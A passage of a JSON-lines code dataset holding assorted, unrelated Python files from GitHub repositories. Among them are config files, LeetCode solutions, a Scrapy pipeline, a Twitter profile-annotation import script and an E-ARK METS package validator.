URL is not recognized as group or user: \"\n + self.url)\n\n cul_file = open(cul_json_lib_path, \"r\")\n cul_json = json.load(cul_file) # read it all at once.\n\n for cul_pub_json in cul_json:\n cul_pub = Pub(cul_pub_json)\n self.add_pub(cul_pub)\n\n cul_file.close()\n self.num_pubs = len(self._by_canonical_title)\n\n return None\n\n def gen_tag_year_url(self, tag, year):\n \"\"\"Given a tag and a year, generate a URL thot shows all papers with\n that tag published in that year.\n\n \"\"\"\n if self.is_user_lib:\n tag_year_url = (\n CUL_BASE_URL\n + \"/search/username?search=Search+library&username=\"\n + self._cul_username\n + \"&q=\"\n + CUL_SEARCH_TAG + tag\n + CUL_SEARCH_LOGICAL_AND\n + CUL_SEARCH_YEAR + year)\n elif self.is_group_lib:\n tag_year_url = (\n CUL_BASE_URL\n + \"/search/group?search=Search+library&group_id=\"\n + self._cul_group_id\n + \"&q=\"\n + CUL_SEARCH_TAG + tag\n + CUL_SEARCH_LOGICAL_AND\n + CUL_SEARCH_YEAR + year)\n\n return tag_year_url\n\n def gen_tag_url(self, tag):\n \"\"\"Given the base URL of a CUL library, e.g.,\n http://www.citeulike.org/group/16008/library\n\n and a tag used in that library, generate a link to all pubs with that\n tag.\n \"\"\"\n if self.is_user_lib:\n tag_url = (\n CUL_BASE_URL\n + \"/user/\"\n + self._cul_username\n + CUL_TAG_SUFFIX\n + tag)\n elif self.is_group_lib:\n tag_url = (\n CUL_BASE_URL\n + \"/group/\"\n + self._cul_group_id\n + CUL_TAG_SUFFIX\n + tag)\n\n return tag_url\n\n def gen_pub_url_in_lib(self, pub):\n \"\"\"given a pub in this library, generate a link to it online.\"\"\"\n\n pub_url = self.url + \"/article/\" + pub.cul_id\n return pub_url\n\n\ndef gen_add_pub_html_link(pub_url):\n \"\"\"Given the URL of a publication, generate a link to add that pub to\n CiteULike.\n \"\"\"\n return (\n 'Submit pub to CiteULike').format(\n pub_url) # TODO: Does this need to be URLencoded?\n","repo_name":"tnabtaf/pub_spork","sub_path":"cul_pub.py","file_name":"cul_pub.py","file_ext":"py","file_size_in_byte":7458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25423898750","text":"broker_url = \"redis://localhost:6379/0\" # Адрес Redis для очереди\nresult_backend = (\n \"redis://localhost:6379/0\" # Адрес Redis для хранения результатов задач\n)\n\ntask_routes = {\n \"send_message_to_discord\": \"main-queue\", # Очередь для задачи send_message_to_discord\n \"run_discord_bot\": \"main-queue\", # Очередь для задачи run_discord_bot\n}\n\nworker_prefetch_multiplier = 1 # Установите значение, соответствующее количеству одновременно обрабатываемых задач\n","repo_name":"EvillFuryCat/Midjourney-API","sub_path":"api/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11166885403","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.0'\n\nsetup(name='example',\n version=version,\n description=\"\",\n long_description=\"\"\"\\\n\"\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='',\n author='',\n author_email='',\n url='',\n license='',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n 'restish',\n 'WebError',\n 'repoze.who',\n 'Tempita',\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n[paste.app_factory]\nmain = example.wsgiapp:make_app\n\n[paste.app_install]\nmain = paste.script.appinstall:Installer\n \"\"\",\n )\n","repo_name":"ish/restish","sub_path":"examples/repoze.who/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"29120854519","text":"#! python3\n\"\"\"\nBài 12:\nCâu hỏi: Viết một chương trình chấp nhận chuỗi là các dòng được nhập vào, chuyển các dòng này thành chữ in hoa và in ra màn hình.\nGiả sử đầu vào là: Hello world\nPractice makes perfect\nThì đầu ra sẽ là: HELLO WORLD\nPRACTICE MAKES PERFECT\n\"\"\"\n\n\ndef upperCase(sentence):\n return sentence.upper()\n\n\ndef main():\n sentences = []\n print(\"Input sentence to upper case. End by empty line\")\n while True:\n s = input()\n if s:\n sentences.append(s)\n else:\n break\n for s in sentences:\n print(upperCase(s))\n\n\ndef test():\n assert(\"OK\" == upperCase(\"ok\")) # normal case\n assert(\"ASSERT\" == upperCase(\"ASSERT\")) # same case\n assert(\"ASSERT\" == upperCase(\"aSsErT\")) # complex case\n print(\"unit test success.\")\n\n\nif __name__ == \"__main__\":\n test()\n main()\n","repo_name":"mrbug2020/PyLearn_100PythonExercises","sub_path":"resolve-exercises/Ex12.py","file_name":"Ex12.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42047528577","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport logging\nfrom services.base import Base\n\nbase = Base()\nclass SpiderbiddingPipeline(object):\n def process_item(self, item, spider):\n conn, cor = base.connDB()\n try:\n o_id=item['OriginId']\n sql=\"\"\"select OriginId From dotnet_operation.dc_InviteBidForenotice where OriginId=%s\"\"\"\n cor.execute(sql,o_id)\n result=cor.fetchall()\n\n if(len(result)==0):\n insertSql=\"\"\"INSERT INTO dotnet_operation.dc_InviteBidForenotice(Id,CompanyId,OriginId,ForenoticeTitle,\n ContactMan,ContactPhone,Email,OriginalUrl,YGText,InviteBidScopeDes,\n EnterCondition,PublishTime,BmEndDate)\n VALUES(UUID(),%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\"\n cor.execute(insertSql,(item['CompanyId'],item['OriginId'],str(item['ForenoticeTitle']).encode('utf8','ignore'),\n item['ContactMan'],item['ContactPhone'],item['Email'],item['OriginalUrl'],str(item['YGText']).encode('utf8','ignore'),str(item['InviteBidScopeDes']).encode('utf8','ignore'),\n item['EnterCondition'],item['publishTime'],item['BmEndDate'] ))\n conn.commit()\n base.connClose(conn, cor)\n print('inserting operation is successfull!!!!')\n except Exception as e:\n logging.exception(e)\n conn.rollback()\n base.connClose(conn,cor)\n return item\n\n # def process_item(self, item, spider):\n # # return item\n #\n # print(item[\"contact\"])\n # print(item['publishTime'])\n # print(item['registerEndTime'])\n # print(item['title'])\n # # print(item['info'])\n # # print(item['url'])\n","repo_name":"ethanliu0823/Scrapy-python-","sub_path":"SpiderBidding/spiderBidding/spiderBidding/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73368202728","text":"class Vacancy:\n __slots__ = ('name', 'company_name', 'url', 'description', 'salary')\n\n def __init__(self, name, company_name, url, description, salary):\n self.name = name\n self.company_name = company_name\n self.url = url\n self.description = description\n self.salary = salary\n\n\n def __str__(self):\n return f'Название вакансии: {self.name}\\nОрганизация: {self.company_name}\\n'\\\n f'Ссылка на вакансию:{self.url}\\n'\\\n f'Описание вакансии: {self.description}\\n'\\\n f'Зарплата:{self.salary[\"from\"]} - {self.salary[\"to\"]}\\n'","repo_name":"anastasiya1306/course_work","sub_path":"vacancy.py","file_name":"vacancy.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70569977770","text":"\"\"\"XDG-related functions.\"\"\"\nimport os\n\n\n# Using or here so that we don't need to try and find $HOME if the prior\n# is configured. We don't *necessarily* need $HOME here.\nXDG_CONFIG_HOME = (os.environ.get('XDG_CONFIG_HOME') or\n os.path.join(os.environ['HOME'], '.config'))\n\nXDG_MUSIC_DIR = (os.environ.get('XDG_MUSIC_DIR') or\n os.path.join(os.environ['HOME'], 'Music'))\n","repo_name":"fennekki/cdparacord","sub_path":"cdparacord/xdg.py","file_name":"xdg.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18025683255","text":"from SDGCBot import pontobiometrico\nfrom SDGCBot import extratordedados\nfrom SDGCBot import calculadoradehoras\nfrom SDGCBot import feriado\nfrom SDGCBot import dadosfuncionario\nimport os\n\n\ntabeladados = dadosfuncionario.dadosfuncionarios(\"dadosfuncionario.csv\")\nmatricula = input(\"Entre com a matricula>>>\")\n\n# ================\n# ENTRADA DE DADOS JOAO\n# ================\nnome = str(tabeladados[0][0])\nmes = str(tabeladados[0][1])\nano = str(tabeladados[0][2])\ncpf = str(tabeladados[0][3])\nmatricula = matricula\ncargahorria = int(tabeladados[0][5])\nlogin = \"-\"\nsenha = \"-\"\n# ================\n\ndatafinal = mes + '-' + ano\ndatainicial = datafinal\n\nparametros_req = {\n 'login': login,\n 'senha': senha,\n 'matricula': matricula,\n 'cpf': cpf,\n 'datafinal': datafinal,\n 'datainicial': datainicial\n}\n\nhtml_str = pontobiometrico.requisitaPesquisa(parametros_req)\nprint(html_str)\n\n\n\n\n\n","repo_name":"jrdutra/projeto-ponto","sub_path":"buscaDadosMatricula.py","file_name":"buscaDadosMatricula.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26324134192","text":"# Decision Tree Classifier\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n# load the iris datasets\ndataset = datasets.load_iris()\n# fitting\nmodel = DecisionTreeClassifier()\nmodel.fit(dataset.data, dataset.target)\nprint(model)\n# predictions\nexpected = dataset.target\npredicted = model.predict(dataset.data)\n# result\nprint(metrics.classification_report(expected, predicted))\nprint(metrics.confusion_matrix(expected, predicted))\n","repo_name":"hjamaan/HaniAlzahrani_MscThesis","sub_path":"CART.py","file_name":"CART.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20574477035","text":"# Link(s): #https://designgurus.org/path-player?courseid=grokking-the-coding-interview&unit=grokking-the-coding-interview_1628743457252_5Unit\n# https://leetcode.com/problems/3sum-closest/description/\n\n\"\"\"\nQuestion:\n\nGiven an array of unsorted numbers and a target number, find a triplet in the array whose sum is as close to the target number as possible, return the sum of the triplet. If there are more than one such triplet, return the sum of the triplet with the smallest sum.\n\"\"\"\n\n\"\"\"\nSample I/O:\n\nInput: [-2, 0, 1, 2], target=2\n\nOutput: 1\n\nExplanation: The triplet [-2, 1, 2] has the closest sum to the target.\n----------------------------\nInput: [0, 0, 1, 1, 2, 6], target=5\n\nOutput: 4\n\nExplanation: There are two triplets with distance '1' from target: [1, 1, 2] & [0,0, 6]. Between these two triplets, the correct answer will be [1, 1, 2] as it has a sum '4' which is less than the sum of the other triplet which is '6'. This is because of the following requirement: 'If there are more than one such triplet, return the sum of the triplet with the smallest sum.'\n\"\"\"\n\n# Code goes here\ndef threeSumClosest(nums, target):\n nums.sort()\n numsLength = len(nums) - 1\n lowestSum = float(\"inf\")\n for i in range(0, numsLength):\n firstNum = nums[i]\n remainingSum = target - firstNum\n first = i + 1\n last = numsLength \n while first < last:\n secondNum = nums[first]\n thirdNum = nums[last]\n currentSum = secondNum + thirdNum\n if currentSum == remainingSum:\n return target\n if abs(target - firstNum - currentSum) < abs(target - lowestSum):\n lowestSum = firstNum + currentSum\n if currentSum < remainingSum:\n if firstNum + currentSum < lowestSum:\n lowestSum = firstNum + currentSum\n first += 1\n else:\n last -= 1\n return lowestSum\n\n\"\"\"\nTC: O(N^2) | SC: O(N) # Required for sorting\n\nExplanation:\nWe use a very similar approach here to the \"Triple Sum to Zero\" or \"3Sum\" problem where we were given an unsorted array and we needed\nto find all triplets whose sum was equal to zero.\n\nUsing a trivial approach, we would need 3 nested loops -> O(N^3) TC.\n\nHowever, we can sort this array and then use a two pointer approach to reduce one nested loop.\nWe do this by using the two pointer approach to find a target sum of two elements using a single run.\n\n1. Sort the array (Note/Reminder: two pointer approach only works on sorted arrays)\n2. Iterate through each element of the array\n3. For each element in the outer loop, calculate the remaining sum needed to reach the target.\n4. Set left pointer to the next element of i, and right pointer at the last element of the sorted array.\n5. Use the two pointer approach to move around the pointers to get closest to the required remaining target sum.\n6. If the current sum of two elements is equal to that required sum, return the target sum itself.\n7. Otherwise, check if the current lowest sum being tracked is closer to the target sum vs the sum of the current element pair.\n8. Swap the lowest sum if needed and keep moving the pointers left and right.\n9. Return the lowest sum.\n\"\"\"","repo_name":"rishabhmthakur2/DSA-Practice","sub_path":"Design Gurus/1. Two Pointer Approach/Triplet sum closest to target.py","file_name":"Triplet sum closest to target.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11643760428","text":"'''\n给你一个字符串 s,找到 s 中最长的回文子串。\n\n示例 1:\n输入:s = \"babad\"\n输出:\"bab\"\n解释:\"aba\" 同样是符合题意的答案。\n\n示例 2:\n输入:s = \"cbbd\"\n输出:\"bb\"\n\n示例 3:\n输入:s = \"a\"\n输出:\"a\"\n\n示例 4:\n输入:s = \"ac\"\n输出:\"a\"\n\n'''\n\nclass Solution(object):\n # 第一次\n '''\n 时间复杂度 O(n^2) 长度1和2的回文中心分别有n和n-1个,每个回文中心最多会向外扩展n次\n 空间复杂度 O(1)\n '''\n def longestPalindrome1(self, s):\n n = len(s)\n def judge(i,j):\n while True:\n if i >= 0 and j < n and s[i] == s[j]:\n i = i - 1\n j = j + 1\n else:\n return i + 1, j - 1\n start, end = 0, 0\n for center in range(len(s) - 1):\n left1, right1 = judge(center, center)\n left2, right2 = judge(center, center + 1)\n if right1 - left1 > end - start:\n start, end = left1, right1\n if right2 - left2 > end - start:\n start, end = left2, right2\n return s[start : end + 1]\n \n # 第二次\n def longestPalindrome1(self, s):\n n = len(s)\n def Judge(i, j):\n result = []\n while i >= 0 and j < n and s[i] == s[j]:\n result = [i, j]\n i -= 1\n j += 1\n return result\n cnt = -1\n for i in range(n):\n result1 = Judge(i, i)\n result2 = Judge(i, i + 1)\n if result1 and result1[1] - result1[0] > cnt:\n ans = result1\n cnt = result1[1] - result1[0]\n if result2 and result2[1] - result2[0] > cnt:\n ans = result2\n cnt = result2[1] - result2[0] \n return s[ans[0]:ans[1]+1]\n \n\n'''\n中心扩展\n从中心开始判断当前两个指针指向的字母是否相等,随后左后退一步右前进一步判断是否相等\n初始可以指向同一个,即为自己与自己相等长度为1\nababad\n ↑\nababad\n ↑ ↑\nababad\n↑ ↑\n1. 通过一个通用的函数去简化程序,而不是用if判断来考虑每一种情况\n2. 归纳if条件能否放在一起,用同样or或and连接。\n'''\n\n\ns = 'bb'\nS = Solution() \n# with timer.timer('time'):\nre = S.longestPalindrome(s)\nprint(re)\n\n \n \n\n\n \n\n\n\n\n ","repo_name":"He1o/NootBook_LeetCode","sub_path":"old/中心扩展/5.最长回文子串.py","file_name":"5.最长回文子串.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19977030724","text":"\"\"\"\nThis imports every profile, not just faces. Slightly larger profiles as result.\n\nIt overwrites the same data pickles to save space.\n\"\"\"\n\nimport pymongo\nfrom db_config import db_connect\n\nfrom pandas.io.json import json_normalize\nimport pandas as pd\nimport numpy as np\n\nfrom PIL import Image\nfrom io import BytesIO\n\ndb = db_connect()\n\n# Importing data\nprofiles = db.twitter_gender\ndata = profiles.find({'annotations': {'$exists': True},\n 'default_profile_image': False},\n {'annotations':1, 'followers_count':1,\n 'friends_count':1, 'id':1, '_id':0})\n\nprint('data imported')\n\n# Flatten & merge & clean\ndef clean_df(df, col_name):\n df.drop(df.filter(regex=col_name), axis=1, inplace=True)\n return df\n\ndef update_nans(df, col_name, col_name2):\n columns = [col for col in df.columns if col_name2 in col]\n print('update_nans info', col_name)\n print(columns)\n for col in columns:\n df[col_name].update(df[col])\n return df\n\ndata = json_normalize(data)\nprint(data.columns)\nprint('df flattened')\nprint('shape data: ', data.shape)\n\nclean_df(data, 'socioe')\n\ndata = data.rename(index=str, columns={'annotations.thomas.image': 'image',\n 'annotations.thomas.gender': 'gender',\n 'annotations.thomas.age': 'age',\n 'annotations.thomas.bot': 'bot',\n 'annotations.thomas.face': 'face',\n 'annotations.thomas.signal': 'signal'\n })\nprint('renamed columns')\n\nfor col in ['image', 'gender', 'age', 'bot', 'face']:\n update_nans(data, col, '.'+col)\nprint('updated columnns')\n\nclean_df(data, 'chris')\nclean_df(data, 'vannesa')\nclean_df(data, 'thomas')\n\n# manual cleaning\ndef manual_clean(df, col, incorrect, correct):\n mask = df[col] == incorrect\n df.loc[mask, col] = correct\n\nmanual_clean(data, 'age', '227', 27)\nmanual_clean(data, 'gender', '0', 'o')\nmanual_clean(data, 'gender', '%2525252525252B', '-')\nmanual_clean(data, 'gender', '%25252525252B', '-')\nmanual_clean(data, 'signal', ' image', 'image')\nmanual_clean(data, 'signal', 'iamge description', 'image description')\nmanual_clean(data, 'signal', '32', '')\nmanual_clean(data, 'signal', 'jandhandle name', 'handle name')\nmanual_clean(data, 'signal', 'twee', 'tweets')\nmanual_clean(data, 'signal', 'image escription', 'image description')\nmanual_clean(data, 'signal', 'image twwets', 'image tweets')\nmanual_clean(data, 'signal', 'escription', 'description')\nmanual_clean(data, 'signal', 'name weets', 'name tweets')\nmanual_clean(data, 'signal', 'image handle descripition', 'image handle description')\nmanual_clean(data, 'signal', 'unage', 'image')\nmanual_clean(data, 'signal', 'twet', 'tweets')\nmanual_clean(data, 'signal', 'o%2Cimage handle', 'image handle')\nprint('manual cleaning done')\n\nfor col in ['age', 'followers_count', 'friends_count']:\n data[col] = data[col].apply(pd.to_numeric, errors='coerce')\nprint('converted columns to numeric')\n\n# Drop unannotated profiles, e.g. if no sensible info about profile was visible\ndata.drop(data[(data['bot']==False) & (data['gender']=='-')].index, inplace=True)\n\n# Drop profiles with low amount of followers and 'friends', because --\n# unsure if these were active on Twitter at all or dummy accounts, etc.\n#data.drop(data[(data['followers_count']<100) | (data['friends_count']<100)].index, inplace=True)\n\nprint('shape data: ', data.shape)\n\n# Create images and convert to numpy array for Tensorflow format\n# Tensorflow images require shape: (nb_sample, height=150, width=150, channel=3)\ndef bin2array(img):\n if isinstance(img, bytes) == False:\n return np.nan\n try:\n img = BytesIO(img)\n img = Image.open(img)\n img = img.resize((224, 224), Image.ANTIALIAS)\n img = img.convert('RGB')\n img = np.asarray(img)\n return img\n except:\n return np.nan\n\ndata['image'] = data['image'].apply(bin2array)\ndata = data.dropna(subset=['image'])\nprint('images are converted')\nprint('shape data: ', data.shape)\nprint(data.columns)\n\ndata.to_pickle('data/complete.pkl')\nprint(data[:5])\n\nprint('shape data: ', data.shape)\n\n# Save df as pickle in data folder\ndata['image'].to_pickle('data/images.pkl')\ndata[['gender', 'age', 'signal',\n 'bot', 'followers_count',\n 'friends_count', 'id']].to_pickle('data/info.pkl')\nprint('everything saved')\n","repo_name":"ThomasRthesis/thesis-final","sub_path":"import_all.py","file_name":"import_all.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37206930001","text":"import fnmatch\nimport logging\nimport os\nfrom pathlib import Path\n\nfrom lxml import etree\nfrom lxml.isoschematron import Schematron\n\nfrom importlib_resources import files\n\nimport eark_ip.api.manifests as MNFST\nimport eark_ip.api.resources.schemas as SCHEMA\nimport eark_ip.api.resources.schematron as SCHEMATRON\nfrom eark_ip.model import (\n MetadataStatus,\n TestResult,\n Severity,\n MetadataChecks,\n MetadataResults,\n Checksum,\n ChecksumAlg,\n ProfileDetails\n)\n\nXLINK_NS = 'http://www.w3.org/1999/xlink'\nMETS_NS = 'http://www.loc.gov/METS/'\nQUAL_METS_NS = '{{{}}}'.format(METS_NS)\nMETS_FILENAME = 'METS.xml'\n\nDILCIS_EXT_NS = 'https://DILCIS.eu/XML/METS/CSIPExtensionMETS'\nSCHEMATRON_NS = \"{http://purl.oclc.org/dsdl/schematron}\"\nSVRL_NS = \"{http://purl.oclc.org/dsdl/svrl}\"\nALGS = vars(ChecksumAlg)\n\nclass FileRef():\n \"\"\"Encapsulate the file reference and integrity details found in METS references.\"\"\"\n def __init__(self, path, size, checksum):\n self._path = Path(path)\n self._size = size\n self._checksum = checksum\n\n @property\n def path(self):\n \"\"\"Return the path of the file reference, will be relative to\n package/representation.\"\"\"\n return self._path\n\n @property\n def size(self):\n \"\"\"Return the stated size of the file in bytes.\"\"\"\n return self._size\n\n @property\n def checksum(self):\n \"\"\"Return the recorded Checksum of the file, includes algorithm and value.\"\"\"\n return self._checksum\n\n def __str__(self):\n return '\\'path\\': \\'{}\\' \\'size\\': \\'{}\\' \\'checksum\\': \\'{}\\''.format(self.path,\n self.size,\n self.checksum)\n\nclass MetsValidator():\n \"\"\"Encapsulates METS schema validation.\"\"\"\n def __init__(self, root):\n self.validation_errors = []\n self.schema_wrapper = etree.XMLSchema(file=str(files(SCHEMA).joinpath('wrapper.xsd')))\n self.rootpath = root\n self.represent_mets = {}\n self.file_refs = []\n\n def validate_mets(self, mets):\n '''\n Validates a Mets file. The Mets file is parsed with etree.iterparse(),\n which allows event-driven parsing of large files. On certain events/conditions\n actions are taken, like file validation or adding Mets files found inside\n representations to a list so that they will be evaluated later on.\n\n @param mets: Path leading to a Mets file that will be evaluated.\n @return: Boolean validation result.\n '''\n # Handle relative package paths for representation METS files.\n self.rootpath, mets = _handle_rel_paths(self.rootpath, mets)\n try:\n parsed_mets = etree.iterparse(mets, events=('start', 'end'), schema=self.schema_wrapper)\n self._element_processor(parsed_mets)\n except etree.XMLSyntaxError as synt_err:\n self.validation_errors.append(TestResult(rule_id=\"METS\", location=mets,\n message=synt_err.msg.replace(QUAL_METS_NS, \"mets:\"),\n severity=Severity.ERROR))\n except Exception as base_err:\n self.validation_errors.append(TestResult(rule_id=\"METS\", location=mets,\n message=str(base_err), severity=Severity.ERROR))\n status = MetadataStatus.NOTVALID if self.validation_errors else MetadataStatus.VALID\n return status == MetadataStatus.VALID, MetadataChecks(status=status,\n messages=self.validation_errors)\n\n def _element_processor(self, parsed_mets):\n for event, element in parsed_mets:\n # Define what to do with specific tags.\n if event == 'end' and element.tag == _q(METS_NS, 'file'):\n # files\n self.file_refs.append(_file_ref_from_ele(element))\n elif event == 'end' and \\\n element.tag == _q(METS_NS, 'fileGrp') and \\\n element.attrib.get('USE', '').startswith('Representations/'):\n # representation mets files\n self._rep_processor(element)\n elif event == 'end' and element.tag in [_q(METS_NS, 'dmdSec'), _q(METS_NS, 'amdSec')]:\n for ref in element.iter(_q(METS_NS, 'mdRef')):\n self.file_refs.append(_file_ref_from_mdref_ele(ref))\n\n def _rep_processor(self, element):\n # representation mets files\n rep = element.attrib['USE'].rsplit('/', 1)[1]\n for file in element.iter(_q(METS_NS, 'file')):\n file_ref = _file_ref_from_ele(file)\n if os.path.basename(file_ref.path).casefold() == METS_FILENAME.casefold():\n self.represent_mets[rep] = file_ref\n else:\n self.file_refs.append(file_ref)\n\ndef _file_ref_from_ele(element):\n algid = element.attrib.get('CHECKSUMTYPE', None)\n chksm = element.attrib.get('CHECKSUM', None)\n size = element.attrib.get('SIZE', None)\n checksum = None\n ref = None\n for alg in ALGS:\n if getattr(ChecksumAlg, alg) == algid:\n checksum = Checksum(algid, chksm)\n for child in element.getchildren():\n if child.tag == _q(METS_NS, 'FLocat'):\n path = child.attrib[_q(XLINK_NS, 'href')]\n ref = FileRef(path, size, checksum)\n return ref\n\ndef _file_ref_from_mdref_ele(element):\n algid = element.attrib.get('CHECKSUMTYPE', None)\n chksm = element.attrib.get('CHECKSUM', None)\n size = element.attrib.get('SIZE', None)\n checksum = None\n ref = None\n for alg in ALGS:\n if getattr(ChecksumAlg, alg) == algid:\n checksum = Checksum(algid, chksm)\n path = element.attrib.get(_q(XLINK_NS, 'href'), None)\n ref = FileRef(path, size, checksum)\n return ref\n\n\ndef _handle_rel_paths(rootpath, metspath):\n if metspath.startswith('file://./'):\n relpath = os.path.join(rootpath, metspath[9:])\n # change self.rootpath to match any relative path found in the\n # current (subsequent) mets\n return relpath.rsplit('/', 1)[0], relpath\n return metspath.rsplit('/', 1)[0], metspath\n\ndef _q(_ns, _v):\n return '{{{}}}{}'.format(_ns, _v)\n\nclass ValidationRules():\n \"\"\"Encapsulates a set of Schematron rules loaded from a single file.\"\"\"\n REP_SKIPS = [\n 'CSIP10',\n 'CSIP11',\n 'CSIP12',\n 'CSIP13',\n 'CSIP14',\n 'CSIP15',\n 'CSIP16',\n 'CSIP101',\n 'CSIP114'\n ]\n def __init__(self, name: str, rules_path: str=None):\n \"\"\"Initialise a set of validation rules from a file or name.\n\n Retrieve a validation profile by type and version # noqa: E501\n\n :param name: The name of the rule set once loaded. If no path is provided\n this param will be compared to the standard set of rules and\n a matching rule set will be loaded if found. For reference the\n standard ruleset corresponds to the different METS file sections\n i.e. amd, dmd, file, hdr, root, structmap\n :type type: str\n :param rules_path: A complete path to a set of schematron rules to load\n :type version: str\n \"\"\"\n self.name = name\n if not rules_path:\n # If no path is provided use the name param to try to load a standard ruleset\n rules_path = str(files(SCHEMATRON).joinpath('mets_{}_rules.xml'.format(name)))\n self.rules_path = rules_path\n logging.debug(\"path: %s\", self.rules_path)\n # Load the schematron file from the path\n self.ruleset = Schematron(file=self.rules_path, store_schematron=True, store_report=True)\n\n def get_assertions(self):\n \"\"\"Generator that returns the rules one at a time.\"\"\"\n xml_rules = etree.XML(bytes(self.ruleset.schematron))\n\n for ele in xml_rules.iter():\n if ele.tag == SCHEMATRON_NS + 'assert':\n yield ele\n\n def validate(self, to_validate):\n \"\"\"Validate a file against the loaded Schematron ruleset.\"\"\"\n xml_file = etree.parse(to_validate)\n self.ruleset.validate(xml_file)\n\n def get_report(self, struct, rep_skips=False):\n \"\"\"Get the report from the last validation.\"\"\"\n xml_report = etree.XML(bytes(self.ruleset.validation_report))\n messages = []\n rule = None\n status = MetadataStatus.VALID\n for ele in xml_report.iter():\n if ele.tag == SVRL_NS + 'fired-rule':\n rule = ele\n elif ele.tag == SVRL_NS + 'failed-assert':\n rule_id = ele.get('id', '')\n if self._skip_assertion(rule_id, struct, rep_skips):\n continue\n test_status, test_result = self._process_ele(rule_id, rule, ele)\n if test_status == MetadataStatus.NOTVALID:\n status = MetadataStatus.NOTVALID\n messages.append(test_result)\n\n return MetadataChecks(status=status, messages=messages)\n\n def _skip_assertion(self, rule_id, struct, rep_skips):\n if rep_skips and rule_id in self.REP_SKIPS:\n return True\n if rule_id == 'CSIP60' and not struct.has_documentation():\n return True\n if rule_id == 'CSIP88' and not struct.has_metadata():\n return True\n if rule_id in ('CSIP97', 'CSIP113') and not struct.has_schemas():\n return True\n if rule_id == 'CSIP114' and not struct.has_representations():\n return True;\n return False\n \n def _process_ele(self, rule_id, rule, ele):\n status = MetadataStatus.VALID\n severity = Severity.WARN\n if ele.get('role') == 'ERROR':\n severity = Severity.ERROR\n status = MetadataStatus.NOTVALID\n elif ele.get('role') == 'INFO':\n severity = Severity.INFO\n return status, TestResult(\n rule_id=rule_id,\n location=rule.get('context').replace('/*[local-name()=\\'', '') +\n '/' + ele.get('test'),\n message=ele.find(SVRL_NS + 'text').text,\n severity=severity\n )\n\nclass ValidationProfile():\n \"\"\" A complete set of Schematron rule sets that comprise a complete validation profile.\"\"\"\n NAMES = {\n 'root': 'METS Root',\n 'hdr': 'METS Header',\n 'amd': 'Adminstrative Metadata',\n 'dmd': 'Descriptive Metadata',\n 'file': 'File Section',\n 'structmap': 'Structural Map'\n }\n SECTIONS = NAMES.keys()\n\n def __init__(self):\n self.rulesets = {}\n self.is_valid = False\n self.results = {}\n self.messages = []\n for section in self.SECTIONS:\n self.rulesets[section] = ValidationRules(section)\n\n def validate(self, to_validate, structure, is_root=True):\n \"\"\"Validates a file against each loaded ruleset.\"\"\"\n is_valid = True\n self.results = {}\n self.messages = []\n for section in self.SECTIONS:\n try:\n self.rulesets[section].validate(to_validate)\n except etree.XMLSyntaxError as parse_err:\n self.is_valid = False\n self.messages.append(parse_err.msg)\n continue\n self.results[section] = self.rulesets[section].get_report(structure, not is_root)\n if self.results[section].status != MetadataStatus.VALID:\n is_valid = False\n self.is_valid = is_valid\n messages = []\n status = MetadataStatus.VALID\n for _, result in self.results.items():\n messages+=result.messages\n if result.status == MetadataStatus.NOTVALID:\n status = MetadataStatus.NOTVALID\n return status == MetadataStatus.VALID, MetadataChecks(status=status, messages=messages)\n\n def get_details(self):\n \"\"\"Return the valiation profile details.\"\"\"\n return ProfileDetails(name='E-ARK Specification for Information Packages',\n type='SIP', version='2.0.4')\n\n def get_results(self):\n \"\"\"Return the full set of results.\"\"\"\n return self.results\n\n def get_result(self, name):\n \"\"\"Return only the results for element name.\"\"\"\n return self.results.get(name)\n\ndef validate_ip(to_validate, struct_map):\n # Schematron validation profile\n schema_results = {}\n schematron_results = {}\n mets_files = {}\n validator = MetsValidator(to_validate)\n mets_path = os.path.join(to_validate, METS_FILENAME)\n results = validator.validate_mets(mets_path)\n schema_results['root'] = results\n mets_files['root'] = validator.file_refs\n for key, file_ref in validator.represent_mets.items():\n print('METS_KEY: ', key, \", REF: \", file_ref)\n rep_validator = MetsValidator(file_ref.path)\n schema_results[key] = 